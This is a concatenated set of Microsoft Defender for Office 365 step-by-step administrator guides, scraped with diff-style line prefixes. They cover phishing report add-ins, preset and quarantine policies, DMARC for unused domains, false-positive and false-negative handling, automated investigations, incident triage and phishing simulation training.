--- Priority account protection offers enhanced visibility for accounts in tooling, along with additional protection when in an advanced defense in-depth configuration state.-
-**Read more here:** [Priority account protection](protect-your-c-suite-with-priority-account-protection.md)
--- Advanced Delivery should be configured to deliver any third party phish simulations correctly, and if you have a Security Operations mailbox, consider defining it as a SecOps mailbox to ensure emails *don't* get removed from the mailbox due to threats.-
-**Read more here:** [Advanced delivery](../advanced-delivery-policy-configure.md)
--- You can configure user reported settings to allow users to report good or bad messages to Microsoft, to a designated reporting mailbox (to integrate with current security workflows) or both. Admins can use the **User reported** tab on the **Submissions** page to triage false positives and false negative user reported messages.-
-**Read more here:** [Deploy and configure the report message add-in to users.](deploy-and-configure-the-report-message-add-in.md)
-
-### Detection, investigation, response, and hunting features
--- Advanced hunting can be used to proactively hunt for threats in your organization, using shared queries from the community to help you get started. You can also use custom detections to set up alerts when personalized criteria are met.-
-**Read more, watch an overview video and get started here:** [Overview - Advanced hunting](../../defender/advanced-hunting-overview.md)
-
-### Education features
--- Attack simulation training allows you to run realistic but benign cyber-attack scenarios in your organization. If you don't already have phishing simulation capabilities from your primary email security provider, Microsoft's simulated attacks can help you identify and find vulnerable users, policies, and practices. This capability contains important knowledge to have and correct *before* a real attack impacts your organization. Post simulation we assign in product or custom training to educate users about the threats they missed, ultimately reducing your organization's risk profile. With Attack simulation training, we deliver messages directly into the inbox, so the user experience is rich. This also means no security changes such as overrides needed to get simulations delivered correctly.-
-**Get started here:** [Get started using Attack simulation.](../attack-simulation-training-get-started.md)
-
-**Jump right into delivering a simulation here:** [How to setup automated attacks and training within Attack simulation training](how-to-setup-attack-simulation-training-for-automated-attacks-and-training.md)
-
-## Step 3 and beyond, becoming a dual use hero
--- Many of the detection, investigation, response, and hunting activities as previously described should be repeated by your security teams. This guidance offers a detailed description of tasks, cadence, and team assignments we would recommend.-
-**Read More:** [Security Operations Guide for Defender for Office 365](../mdo-sec-ops-guide.md)
--- Consider user experiences such as accessing multiple quarantines, or the submission / reporting of false positives and false negatives. You can mark messages detected by the third party service with a custom *X* header. For example, you can use mail flow rules to detect and quarantine email that contains the *X* header. This result also gives users a single place to access quarantined mail.-
-**Read More:** [How to configure quarantine permissions and policies](how-to-configure-quarantine-permissions-with-quarantine-policies.md)
--- The Migration guide contains lots of useful guidance on preparing and tuning your environment to ready it for a migration. But many of the steps are *also* applicable to a dual-use scenario. Simply ignore the MX switch guidance in the final steps.-
-**Read it here:** [Migrate from a third-party protection service to Microsoft Defender for Office 365 - Office 365 | Microsoft Docs.](../migrate-to-defender-for-office-365.md)
-
-## More information
-
-[Migrate from a third-party protection service to Microsoft Defender for Office 365](../migrate-to-defender-for-office-365.md)
-
-[Security Operations Guide for Defender for Office 365](../mdo-sec-ops-guide.md)
-
-[Get more out of Microsoft Defender for Office 365 with Microsoft Defender XDR.](https://www.youtube.com/watch?v=Tdz6KfruDGo)
security Deploy And Configure The Report Message Add In https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/step-by-step-guides/deploy-and-configure-the-report-message-add-in.md
- Title: How-to deploy and configure the report message add-in
-description: The steps to deploy and configure Microsoft's phish reporting add-ins aimed at security administrators.
-
- - NOCSH
------ m365-guidance-templates-- m365-security-- tier3- Previously updated : 01/31/2023--
-# Deploy and configure the Report Message add-in to users
-
-The Report Message and Report Phishing add-ins for Outlook make it easy to report phishing to Microsoft and its affiliates for analysis, along with easy triage for admins on the **Submissions** page at <https://security.microsoft.com/reportsubmission?viewid=user>.
-
-Depending on whether you're licensed for Defender for Office 365, you also get added functionality such as alerting & automated investigation and response (AIR), which removes the burden from your security operations staff. This guide walks you through configuring the add-in deployment as recommended by the Microsoft Defender for Office 365 team.
-
-## Choose between which add-in to deploy
--- The Report Phishing add-in provides the option to report only phishing messages-- The Report Message add-in provides the option to report junk, not junk (false positive), and phishing messages-- The built-in Report button in Outlook on the web *[Learn More](../submissions-outlook-report-messages.md)*-
-## What you need
--- Exchange Online Protection (some features require Defender for Office 365 Plan 2).-- Sufficient permissions (Global admin for add-in deployment, security admin for customization).-- 5-10 minutes to perform the steps in this article.-
-## Deploy the add-in for users
-
-1. **Login** to the Microsoft 365 admin center at <https://admin.microsoft.com>.
-1. On the left nav, press **Show All** then expand **Settings** and select **Integrated Apps**.
-1. On the page that loads, press **Get Apps**.
-1. In the page that appears, in the top right Search box, enter **Report Message** or **Report Phishing**, and then select **Search**.
-1. Press **Get it now** on your chosen app within the search results (publisher is **Microsoft Corporation**).
-1. On the flyout that appears, select who to deploy the add-in to. If testing, you might want to use a specific group. Otherwise, configure it for the **entire organization**. After you make a selection, press **Next**.
-1. Review the permissions, information, and capabilities then press **Next**.
-1. Press **Finish deployment** (it can take 12-24 hours for the add-in to appear automatically in Outlook clients).
-
-## Configure the add-in for users
-
-1. **Login** to the Microsoft Security portal at <https://security.microsoft.com>.
-2. On the left nav, select **Settings** and choose **Email & collaboration**.
-3. Select **User reported settings**.
-4. Ensure **Monitor report messages in outlook** is selected and select **use the built-in report button**.
-5. Under **Send the reported messages to** choose **Microsoft Only** (Recommended).
-
-## Optional steps ΓÇô configure notifications
-
-1. On the configuration page from the earlier steps, underneath the **User reporting experience**, configure the before and after reporting pop-ups title and body if desired. The end users see the before reporting pop-up if **Ask me before reporting** is also enabled.
-2. If you wish for notifications to come from an internal organizational mailbox, select **Specify Office 365 email address to use as sender** and search for a valid mailbox in your organization to send the notifications from.
-3. Press **Customize notifications** to set up the text sent to reporting users after admin reviews a reported message using Mark & Notify, configure the **Phishing**, **Junk** & **No threats** found options.
-4. On the **Footer** tab, select the global footer to be sent for notifications, along with your organization's logo if appropriate.
-
-### Further reading
-
-Learn more about user reported settings [User reported settings](../submissions-user-reported-messages-custom-mailbox.md).
-
-Enable the report message or report phishing add-in [Enable the Microsoft Report Message or Report Phishing add-ins](../submissions-users-report-message-add-in-configure.md).
security Ensuring You Always Have The Optimal Security Controls With Preset Security Policies https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/step-by-step-guides/ensuring-you-always-have-the-optimal-security-controls-with-preset-security-policies.md
- Title: Steps to set up the Standard or Strict preset security policies for Microsoft Defender for Office 365
-description: Step to set up preset security policies in Microsoft Defender for Office 365 so you have the security recommended by the product. Preset policies set a security profile of either *Standard* or *Strict*. Set these and Microsoft Defender for Office 365 will manage and maintain these security controls for you.
------- m365-guidance-templates-- m365-security-- tier3- Previously updated : 8/21/2023--
-# Set up steps for the Standard or Strict preset security policies in Microsoft Defender for Office 365
-
-Does Microsoft Defender for Office 365 gave you a way to apply security policies that it would then maintain?
-
-Did you know that when a best practice for a security control changes due to the evolving threat landscape, or as new controls are added, Microsoft *automatically* updates security control settings for users assigned to a *Standard* or *Strict* preset security policy?
-
-By using preset security policies (*Standard* or *Strict*), you'll always have Microsoft's *recommended, best practice, configuration* for your users.
-
-**Use the steps below** to apply preset security policies and have Microsoft Defender for Office 365 manage and maintain security controls *for you*.
-
-## What you will need
--- Microsoft Defender for Office 365 Plan 1 or higher (Included in E5)-- Sufficient permissions (Security Administrator role)-- 5 minutes to perform the steps below.-
-## Choose between Standard and Strict policies
-
-Our Strict preset security policy has more aggressive limits and settings for security controls that result in more aggressive detections and involve the admin in making decisions on which blocked emails are released to end users.
--- Collect the list of your users that require more aggressive detections even if it means more good mail gets flagged as suspicious. These are typically your executive staff, executive support staff, and historically highly targeted users.--- Ensure that the selected users have admin coverage to review and release emails if the end user thinks that the mail might be good and requests that the message be released to them.--- If the criteria above are met, then the user should be placed in the Strict preset security policy. Otherwise the user should be placed in the Standard preset security policy.-
-> [!TIP]
-> For information on what Standard and Strict security policies are, see this [article](../../office-365-security/recommended-settings-for-eop-and-office365.md).
-
-## Enable Security Presets in Microsoft Defender for Office 365
-
-Once you've chosen between the Standard and Strict security preset policies for your users, it takes a few further steps to assign users to each preset.
-
-1. Identify the users, groups, or domains you would like to include in Standard and Strict security presets.
-1. Log in to the Microsoft Security portal at <https://security.microsoft.com>.
-1. On the left nav, under **Email & collaboration**, select **Policies & rules**.
-1. Select **Threat policies**.
-1. Select **Preset Security Policies** underneath the **Templated policies** heading
-1. Select **Manage** underneath the Standard protection preset.
-1. Select **All Recipients** to apply Exchange Online Protection tenant wide, or select **Specific recipients** to manually add users, groups, or domains you want to apply the protection policy to. Click the **Next** button.
-1. Select **All Recipients** to apply Defender for Office 365 Protection tenant wide, or select **Specific recipients** to manually add users, groups, or domains you want to apply the protection policy to. Click the **Next** button.
-1. On the **Impersonation Protection** section, add email addresses & domains to protect from impersonation attacks, then add any trusted senders and domains you don't want the impersonation protection to apply to, then press **Next**.
-1. Click on the **Confirm** button.
-1. Select the **Manage protection settings** link in the Strict protection preset.
-1. Repeat steps 7-10 again, but for these users *strict* protection should be applied.
-1. Click on the **Confirm** button.
-
-> [!TIP]
-> To learn more about preset policies click [here](../../office-365-security/preset-security-policies.md)
-
-## Your next step is Config Analyzer
-
-Use config analyzer to determine if your users are configured per Microsoft's best practices.
-
-> [!TIP]
-> Configuration analyzer allows admins to find and fix security policies where the settings are below the Standard or Strict protection profile settings in preset security policies. Find out more about Configuration analyzer [here](../../office-365-security/configuration-analyzer-for-security-policies.md).
-
-Secure Presets are always recommended because it *ensures* admins are exercising Microsoft best practices. However, in some cases customized configurations are required. Learn about the reasons to use custom policies [here](../../office-365-security/mdo-deployment-guide.md#determine-your-protection-policy-strategy)
security How To Configure Quarantine Permissions With Quarantine Policies https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/step-by-step-guides/how-to-configure-quarantine-permissions-with-quarantine-policies.md
- Title: How to configure quarantine permissions and policies
-description: The steps to configure quarantine policies and permissions across different groups, including AdminOnlyPolicy, limited access, full access, and providing security admins and users with a simple way to manage false positive folders.
------- m365-guidance-templates-- m365-security-- tier3- Previously updated : 01/31/2023--
-# How to configure quarantine permissions and policies
-
-Providing security admins and users with a simple way to manage false positive folders is vital, given the increased demand for a more aggressive security posture with the evolution of hybrid work. Taking a prescriptive approach, admins and users can achieve this with the guidance in this article.
-
-> [!TIP]
-> For a short video aimed at admins trying to set quarantine permissions and policies, [see this link](https://www.youtube.com/watch?v=vnar4HowfpY). If you are an end user opt for this [1 minute overview](https://www.youtube.com/watch?v=s-vozLO43rI) of the process.
-
-## What you need
--- Sufficient permissions (Security Administrator role)-- 5 minutes to perform the following procedures.-
-## Deciding between built-in or custom quarantine policies.
-
-Our custom policies give admins the ability to decide what items their users can triage in the ***False positive*** folder with an extended ability of allowing the user to request the *release* of those items from the folder.
-
-1. Decide what verdicts category (bulk, spam, phish, high confidence phish, or malware) of items you want your user to triage and not triage.
-1. For those categories that you don't want the users to triage, assign the items to the **AdminOnlyPolicy**. As for the category you want users to triage with limited access, you can *create a custom policy* with a request release access and assign users to that category.
-1. It's **strongly recommended** that malware and high confidence phish items be assigned to **AdminOnlyPolicy**, regular confidence phish items be assigned *limited access with request release*, while bulk and spam can be left as full access for users.
-
-> [!IMPORTANT]
-> For more information on how granular custom policies can be created, see [Quarantine policies - Office 365 | Microsoft Docs](../../office-365-security/quarantine-policies.md).
-
-## Assigning quarantine policies and enabling notification with organization branding
-
-When your security team has decided on which categories of items that users can triage (or not), and they've created the corresponding quarantine policies, admins should assign these policies to the respective users and enable notifications.
-
-1. Identify the users, groups, or domains that you would like to include in the *full access* category vs. the *limited access* category, versus the *Admin-Only* category.
-1. Sign in to the [Microsoft Security portal](https://security.microsoft.com).
-1. On the left nav, under **Email & collaboration**, select **Policies & rules**.
-1. Select **Threat policies**.
-1. Select each of the following: **Anti-spam policies**, **Anti-phishing policy**, **Anti-Malware policy**.
-1. Select **Create policy** and choose **Inbound**.
-1. Add policy Name, users, groups, or domains to apply the policy to, and **Next**.
-1. In the **Actions** tab, select **Quarantine message** for categories. You notice another panel for *select quarantine policy*. Use the dropdown to select the quarantine policy you created earlier.
-1. Move on to the **Review** section and select the **Confirm** button to create the new policy.
-1. Repeat these same steps for the other policies: **Anti-phishing policy**, **Anti-Malware policy**, and **Safe Attachment policy**.
-> [!TIP]
-> For more detailed information on what you've learned so far, see [Configure spam filter policies - Office 365](../../office-365-security/anti-spam-policies-configure.md)| [Configure anti-phishing policies in EOP](../../office-365-security/anti-phishing-policies-eop-configure.md) | [Configure anti-malware policies](../../office-365-security/anti-malware-policies-configure.md)| [Set up Safe Attachments policies in Microsoft Defender for Office 365](../../office-365-security/safe-attachments-policies-configure.md)
-
-## Next Steps
--- Use **Global policy** available in quarantine policy to enable your organization branding logo, display name, and disclaimer.-- Also set the **User frequency to 1 day** for the quarantine notification.-
-## More information
-
-Learn more about organization branding and notification settings here [Quarantine policies](../../office-365-security/quarantine-policies.md).
-
security How To Enable Dmarc Reporting For Microsoft Online Email Routing Address Moera And Parked Domains https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/step-by-step-guides/how-to-enable-dmarc-reporting-for-microsoft-online-email-routing-address-moera-and-parked-domains.md
- Title: How to enable DMARC Reporting for Microsoft Online Email Routing Address (MOERA) and parked Domains
-description: The steps to configure DMARC for MOERA and parked domains.
------- m365-guidance-templates-- m365-security-- tier3- Previously updated : 01/31/2023--
-# How to enable DMARC Reporting for Microsoft Online Email Routing Address (MOERA) and parked Domains
-
-Best practice for domain email security protection is to protect yourself from spoofing using Domain-based Message Authentication, Reporting, and Conformance (DMARC). Enabling DMARC for your domains should be the first step as described here: [Domain-based Message Authentication, Reporting, and Conformance (DMARC)](../email-authentication-dmarc-configure.md)
-
-This guide is designed to help you configure DMARC for domains not covered by the main DMARC article. These domains include domains that you're not using for email, but could be used by attackers if they remain unprotected:
--- Your `onmicrosoft.com` domain, also known as the Microsoft Online Email Routing Address (MOERA) domain.-- Parked custom domains that you're currently not using for email yet.-
-## What you need
--- Microsoft 365 admin center and access to your DNS provider hosting your domains.-- Sufficient permissions as Global Admin to make the appropriate changes in the Microsoft 365 admin center.-- 10 minutes to complete the steps in this article.-
-## Activate DMARC for MOERA Domain
-
-1. Open the Microsoft 365 admin center at <https://admin.microsoft.com>.
-1. On the left-hand navigation, select **Show All**.
-1. Expand **Settings** and press **Domains**.
-1. Select your tenant domain (for example, contoso.onmicrosoft.com).
-1. On the page that loads, select **DNS records**.
-1. Select **+ Add record**.
-1. A flyout opens. Ensure that the selected Type is **TXT (Text)**.
-1. Add `_dmarc` as **TXT name**.
-1. Add your specific DMARC value. For more information, see [Syntax for DMARC TXT records](../email-authentication-dmarc-configure.md#syntax-for-dmarc-txt-records).
-1. Press **Save**.
-
-## Active DMARC for parked domains
-
-1. Check if SPF is already configured for your parked domain. For instructions, see [SPF TXT records for custom domains in Microsoft 365](../email-authentication-spf-configure.md#spf-txt-records-for-custom-domains-in-microsoft-365).
-1. Contact your DNS Domain provider.
-1. Ask to add this DMARC txt record with your appropriate email addresses: `v=DMARC1; p=reject; rua=mailto:d@rua.contoso.com;ruf=mailto:d@ruf.contoso.com`.
-
-## Next Steps
-
-Wait until the DNS changes are propagated and try to spoof the configured domains. Check if the attempt is blocked based in the DMARC record, and you receive a DMARC report.
-
-## More Information
-
-[Set up SPF to help prevent spoofing](../email-authentication-spf-configure.md).
-
-[Use DMARC to validate email, setup steps](../email-authentication-dmarc-configure.md).
security How To Handle False Negatives In Microsoft Defender For Office 365 https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/step-by-step-guides/how-to-handle-false-negatives-in-microsoft-defender-for-office-365.md
- Title: (False Negatives) How to handle malicious emails that are delivered to recipients using Microsoft Defender for Office 365
-description: The steps to handle malicious emails coming through to end users and inboxes (as False Negatives) with Microsoft Defender for Office 365 in order to prevent loss of business.
------- m365-guidance-templates-- m365-security-- tier3- Previously updated : 01/31/2023--
-# How to handle malicious emails that are delivered to recipients (False Negatives), using Microsoft Defender for Office 365
-
-Microsoft Defender for Office 365 helps deal with malicious emails (False Negative) that are delivered to recipients and that put your organizational productivity at risk.
-Defender for Office 365 can help you understand why emails are getting delivered, how to resolve the situation quickly, and how to prevent similar situations from happening in the future.
-
-## What you'll need
--- Microsoft Defender for Office 365 Plan 1 and 2 (included as part of E5). Exchange Online customers can also leverage this.-- Sufficient permissions (Security Administrator role).-- 5-10 minutes to perform the steps below.-
-## Handling malicious emails in the Inbox folder of end users
-
-1. Ask end users to report the email as **phishing** or **junk** using Microsoft Message Add-in or Microsoft Phish add-in or the Outlook buttons.
-2. End users can also add the sender to the [block senders list](https://support.microsoft.com/office/block-a-mail-sender-b29fd867-cac9-40d8-aed1-659e06a706e4#:~:text=1%20On%20the%20Home%20tab%2C%20in%20the%20Delete,4%20Click%20OK%20in%20both%20open%20dialog%20boxes..) in Outlook to prevent emails from this sender from being delivered to their inbox.
-3. Admins can triage the user reported messages from [User reported tab on the Submissions page](../admin-submission.md#view-user-reported-messages-to-microsoft).
-4. From those reported messages, admins can **submit to** [Microsoft for analysis](../submissions-admin-review-user-reported-messages.md#notify-users-from-within-the-portal) to learn why that email was allowed in the first place.
-5. If needed, while submitting to Microsoft for analysis, admins can [create a block entry for the sender](../tenant-allow-block-list-email-spoof-configure.md#create-block-entries-for-domains-and-email-addresses) to mitigate the problem.
-6. Once the results for submissions are available, read the verdict to understand why emails were allowed, and how your tenant setup could be improved to prevent similar situations from happening in the future.
-
-## Handling malicious emails in junk folder of end users
-
-1. Ask end users to report the email as **phishing** using Microsoft Message Add-in, or Microsoft Phish Add-in, or the Outlook buttons.
-2. Admins can triage the user reported messages from the [User reported tab on the Submissions page](../submissions-admin.md#view-user-reported-messages-to-microsoft).
-3. From those reported messages admins can **submit to** [Microsoft for analysis](../submissions-admin.md#notify-users-about-admin-submitted-messages-to-microsoft) and learn why that email was allowed in the first place.
-4. If needed, while submitting to Microsoft for analysis, admins can [create a block entry for the sender](../tenant-allow-block-list-email-spoof-configure.md#create-block-entries-for-domains-and-email-addresses) to mitigate the problem.
-5. Once the results for submissions are available, read the verdict to understand why emails were allowed, and how your tenant setup could be improved to prevent similar situations from happening in the future.
-
-## Handling malicious emails landing in the quarantine folder of end users
-
-1. End users receive an [email digest](../quarantine-quarantine-notifications.md) about quarantined messages as per the settings enabled by admins.
-2. End users can preview the messages in quarantine, block the sender, and submit those messages to Microsoft for analysis.
-
-## Handling malicious emails landing in the quarantine folder of admins
-
-1. Admins can view the quarantined emails (including the ones asking permission to request release) from the [review page](../quarantine-admin-manage-messages-files.md).
-2. Admins can submit any malicious, or suspicious messages to Microsoft for analysis, and create a block to mitigate the situation while waiting for verdict.
-3. Once the results for submissions are available, read the verdict to learn why the emails were allowed, and how your tenant setup could be improved to prevent similar situations from happening in the future.
security How To Handle False Positives In Microsoft Defender For Office 365 https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/step-by-step-guides/how-to-handle-false-positives-in-microsoft-defender-for-office-365.md
- Title: (False Positives) How to handle legitimate emails getting blocked from delivery using Microsoft Defender for Office 365
-description: The steps to handle legitimate email getting blocked(False Positive) by Microsoft Defender for Office 365 in order to prevent lose of business.
------- m365-guidance-templates-- m365-security-- tier3- Previously updated : 01/31/2023--
-# How to handle Legitimate emails getting blocked (False Positive), using Microsoft Defender for Office 365
-
-Microsoft Defender for Office 365 helps deal with important legitimate business emails that are mistakenly blocked as threats (False Positives). Defender for Office 365 can help admins understand *why* legitimate emails are being blocked, how to resolve the situation quickly, and prevent similar situations from happening in the future.
-
-## What you'll need
--- Microsoft Defender for Office 365 Plan 1 or 2 (included as part of E5). Exchange Online customers can also leverage this feature.-- Sufficient permissions (Security Administrator role).-- 5-10 minutes to perform the steps below.-
-## Handling legitimate emails in to Junk folder of end users
-
-1. Ask end users to report the email as **not junk** using Microsoft Message Add-in or the Outlook buttons.
-2. End users can also add the sender to the [**safe sender list**](https://support.microsoft.com/office/safe-senders-in-outlook-com-470d4ee6-e3b6-402b-8cd9-a6f00eda7339) in Outlook to prevent the email from these senders landing in Junk folder.
-3. Admins can triage the user-reported messages from [the User reported tab on the Submission page](../submissions-admin.md#view-user-reported-messages-to-microsoft).
-4. From those reported messages admins can submit to [**Microsoft for analysis**](../submissions-admin.md#notify-users-about-admin-submitted-messages-to-microsoft) and understand why was that email blocked in the first place.
-5. If needed, while submitting to Microsoft for analysis, admins can judiciously [create an allow entry for the sender](../tenant-allow-block-list-email-spoof-configure.md#create-allow-entries-for-domains-and-email-addresses) to mitigate the problem.
-6. Once the results from the admin submission are available, read it to understand why emails were blocked and how your tenant setup could be improved to *prevent* similar situations from happening in the future.
-
-## Handling legitimate emails that are in quarantine folder of end users
-
-1. An end user receives an [email digest](../quarantine-quarantine-notifications.md) about quarantined messages as per the settings enabled by security admins.
-2. End users can preview the messages in quarantine, block the sender, release the messages, submit those messages to Microsoft for analysis, and request release of those emails from admins.
-
-## Handling legitimate emails in quarantine folder of an admin
-
-1. Admins can view the quarantined emails (including the ones asking permission to request release) from the [review page](../quarantine-admin-manage-messages-files.md).
-2. Admins can release the message from quarantine while submitting it to Microsoft for analysis, and create a temporary allow to mitigate the situation.
-3. Once the results for submissions are available, admins should read the verdict to understand the reason.
- - If false positives are due to tenant configuration, admins can correct it to mitigate the issue.
- - If false positives are due to other factors, Microsoft learns from the submission and similar messages aren't quarantined anymore. For more information, see [Automatic tenant Allow/Block list expiration management](https://techcommunity.microsoft.com/t5/microsoft-defender-for-office/automatic-tenant-allow-block-list-expiration-management-is-now/ba-p/3723447).
-
-> [!NOTE]
-> Admins need to manually release any similar messages that have already been quarantined, as the quarantined messages aren't released automatically. To find and release quarantined messages in bulk, see [Can I release or report more than one quarantined message at a time?](../quarantine-faq.yml#can-i-release-or-report-more-than-one-quarantined-message-at-a-time-)
security How To Prioritize And Manage Automated Investigations And Response Air https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/step-by-step-guides/how-to-prioritize-and-manage-automated-investigations-and-response-air.md
- Title: How to prioritize and manage Automated Investigations and Response (AIR).
-description: How to steps to analyze and approve AIR actions directly from the Action Center. When alerts are triggered, Automated Investigation and Response (AIR) determines the scope of impact of a threat in your organization and provided recommended remediation actions.
------- m365-guidance-templates-- m365-security-- tier3- Previously updated : 04/04/2024--
-# Prioritize and manage Automated Investigations and Response (AIR)
-
-Automated Investigation and Response (AIR) saves your security operations team time and effort.
--- When alerts are triggered, automated investigation will determine the scope of impact of a threat in your organization and provide recommended remediation actions.-- Security teams can save time by leveraging AIR automation to reduce the need for manual hunting.-- These investigations can identify emails that haven't been cleaned-up by Zero-hour Auto Purge (ZAP) or other remediation.-- AIR investigations also identify mailbox configurations that may be risky or indicate a compromised mailbox.-
-Investigation actions (and investigations) are accessible from several points in the Microsoft Security portal: via *Incidents*, via *Alerts*, or via *Action Center*. Which admins use is based on the workflow an admin is pursuing.
-
-## Why use the Action Center workflow
-
-As automated investigations on *Email & collaboration* content results in verdicts, such as *Malicious* or *Suspicious*, certain remediation actions are created. The remediation actions suggested aren't carried out automatically. SecOps must navigate to each investigation to *approve* those suggested actions. In the *Action Center* all the pending actions are aggregated for quick approval.
-
-## What you'll need
--- Microsoft Defender for Office 365 Plan 2 or higher (Included with E5)-- Sufficient permissions (Security reader, security operations, or security administrator, plus [Search and purge](../mdo-portal-permissions.md) role)-
-## Steps to analyze and approve AIR actions directly from the Action Center
-
-1. Navigate to [Microsoft Defender portal](https://security.microsoft.com/action-center) and sign in.
-2. When the Action center loads, filter and prioritize by clicking columns to sort the actions, or press **Filters** to apply a filter such as *entity type* (for a particular URL) or action type (such as soft delete email).
-3. A flyout will open once an action is clicked. It will appear on right-hand side of the screen for review.
-4. For more information about why an action is requested, select **Open investigation page** in the flyout to learn more about the investigation or alerts linked to this action. (Admins can also approve actions seen on the investigation page by selecting the *Pending Actions* tab.)
-5. Otherwise, select **Approve** to take the recommended action directly from the Action Center.
-6. Reject the action, if you determine it's unnecessary.
-
-## Check AIR history
-
-1. Navigate to the [Microsoft Defender portal](https://security.microsoft.com) and sign in.
-2. In the left-hand navigation pane, expand **Action & submissions** then click **Action Center**.
-3. When the Action Center loads press the **History** tab.
-4. View the history of AIR, including decisions made, source of action, and admin who made the decision, if appropriate.
-
-## More Information
-
-[View the results of an automated investigation in Microsoft 365 - Office 365 | Microsoft Docs](../air-view-investigation-results.md)
-
-[Learn about approving and rejecting pending actions from the Investigation page](../air-review-approve-pending-completed-actions.md)
security How To Prioritize Manage Investigate And Respond To Incidents In Microsoft 365 Defender https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/step-by-step-guides/how-to-prioritize-manage-investigate-and-respond-to-incidents-in-microsoft-365-defender.md
- Title: How to prioritize, Manage, Investigate & Respond to Incidents in Microsoft Defender XDR
-description: The steps to manage alerts triggered in Microsoft Defender XDR. Automated investigation and response (AIR) hunt across the subscription and determines the impact and scope of a threat, and combines the information into a single Incident.
------- m365-guidance-templates-- m365-security-- tier3- Previously updated : 01/31/2023--
-# Prioritize, Manage, Investigate & Respond to Incidents in Microsoft Defender XDR
-
-When alerts are triggered in Microsoft Defender XDR, automated investigation and response (AIR) begins and hunts across an organization's subscription, determine the impact and scope of the threat, and collate the information into a single Incident so that admins don't have to manage multiple incidents.
-
-## What you need
--- Microsoft Defender for Office 365 Plan 2 or higher-- Sufficient permissions (Security reader, security operations, or security administrator, plus [Search and purge](../mdo-portal-permissions.md) role)-
-## Prioritize & manage Incidents
-
-Navigate to the security portal Incidents page <https://security.microsoft.com/incidents>.
-
-When the Incident page loads you can filter and prioritize by clicking columns to sort the actions or press Filters to apply a filter such as data source, tags or state.
-
-Now you have a prioritized list of incidents, from which you can select to rename, assign, classify, tag, change the status or add comments via the **Manage incidents** button.
-
-Use the filters to make sure Microsoft Defender for Office 365 items are included.
-
-If you're looking for specific alerts, either use the incident search capability (*Search for name or ID*) or consider using the alert queue filtering on a specific alert.
-
-## Investigate & Respond to Incidents
-
-After you have prioritized your incident queue, select the Incident you'd like to investigate to load the incidents Overview page. You see useful information, such as *MITRE ATT&CK techniques observed* and a *timeline of the attack*.
-
-The tabs at the top of the incident page allow you to explore more details such as the affected users, mailboxes, endpoints, and et cetera.
-
-The *Evidence and Response* tab shows items identified as related to the original alert via the investigation.
-
-Any items showing as *Pending Action* within Evidence and Response are awaiting approval from an administrator. Sorting by the remediation status column in the *All Evidence* view is recommended, followed by clicking the entity or cluster to load the flyout menu where you can then approve the actions if appropriate.
-
-If you need to understand the items involved further, you can use the incident graph to see the visual linkage of the evidence and entities involved. Alternatively, you can review the underlying investigations, which show more of the entities and items involved in the security event.
-
-## Next Steps
-
-You can start using *Action Center* to act on pending action items from all incidents in your organization if you want to focus on the action items AIR needs approval for.
-
-## More Information
-
-[Manage incidents in Microsoft Defender XDR | Microsoft Docs](../../defender/manage-incidents.md).
-
-[How automated investigation and response works in Microsoft Defender for Office 365](../air-examples.md).
-
-[Remediation actions in Microsoft Defender for Office 365](../air-remediation-actions.md).
security How To Run Attack Simulations For Your Team https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/step-by-step-guides/how-to-run-attack-simulations-for-your-team.md
- Title: How to run attack simulations for your team
-description: The steps to send an Attack Simulation payload to your target users for your team or organization for training. Simulated attacks can help you identify and find vulnerable users, policies, and practices before a real attack impacts your organization.
-
- - NOCSH
------ m365-guidance-templates-- m365-security-- tier3- Previously updated : 01/31/2023--
-# How to run attack simulations for your team
-
-Attack simulation training allows you to run realistic but benign cyber attack scenarios in your organization. Simulated attacks can help you identify and find vulnerable users, policies, and practices before a real attack impacts your organization, using inbuilt or custom training to reduce risk and better educate end users about threats.
-
-## What you need
--- Microsoft Defender for Office 365 Plan 2 (included as part of E5)-- Sufficient permissions (Security Administrator role)-- 5-10 minutes to perform the following procedures.-
-## Send a payload to target users
-
-1. Navigate to [Attack Simulation Training](https://security.microsoft.com/attacksimulator) in your subscription.
-1. Choose **Simulations** from the top navigation bar.
-1. Select **Launch a simulation**.
-1. Pick the technique you'd like to use from the flyout, and select **Next**.
-1. Name the Simulation with something relevant / memorable and select **Next**.
-1. Pick a relevant payload from the wizard, review the details and customize if appropriate, when you're happy with the choice, select **Next**.
-1. Choose who to target with the payload. If you're choosing the entire organization, select that option and then select **Next**.
-1. Otherwise, select **Add Users** and then search or filter the users with the wizard. Select Add Users and then **Next**.
-1. Under **Select training content preference**, leave the default *Microsoft training experience (Recommended)* or select *Redirect to a custom URL* if you want to use the custom URL. If you don't want to assign any training, then select *No training*.
- - You can either let Microsoft assign training courses by selecting *Assign training for me* or you can choose specific modules with *Select training courses and modules myself*
- - Select a Due Date (30, 15, or 7 days) from the drop-down menu.
- - Select **Next** to continue.
-1. Customize the landing page displayed when a user is phished if appropriate, or otherwise leave the Microsoft Default.
- 1. Under **Payload indicators**, check the box to add payload indicators to email. Adding payloads helps users to learn how to identify the phishing email. Select *Open preview panel* to view the message.
- 1. Select **Next** to continue.
-1. Choose if you'd like end user notifications, and if so, select the delivery preferences and customize where needed.
- 1. Notice that you can also select *default language* for the notification under the **Select default language** drop-down menu.
-1. Select when to launch the simulation, and how long it should be valid for. You can also enable *region aware time zone delivery*. This option delivers simulated attack messages to your employees during *their working hours* based on their region. Select **Next**.
-1. Send a test if you're ready. Review the summary of choices. Select **Submit**.
-
-### Further reading
-
-To learn how Attack Simulation works see [Simulate a phishing attack with Attack simulation training - Office 365 | Microsoft Docs](../../office-365-security/attack-simulation-training-simulations.md).
security How To Setup Attack Simulation Training For Automated Attacks And Training https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/step-by-step-guides/how-to-setup-attack-simulation-training-for-automated-attacks-and-training.md
- Title: How to setup automated attacks and training within Attack simulation training
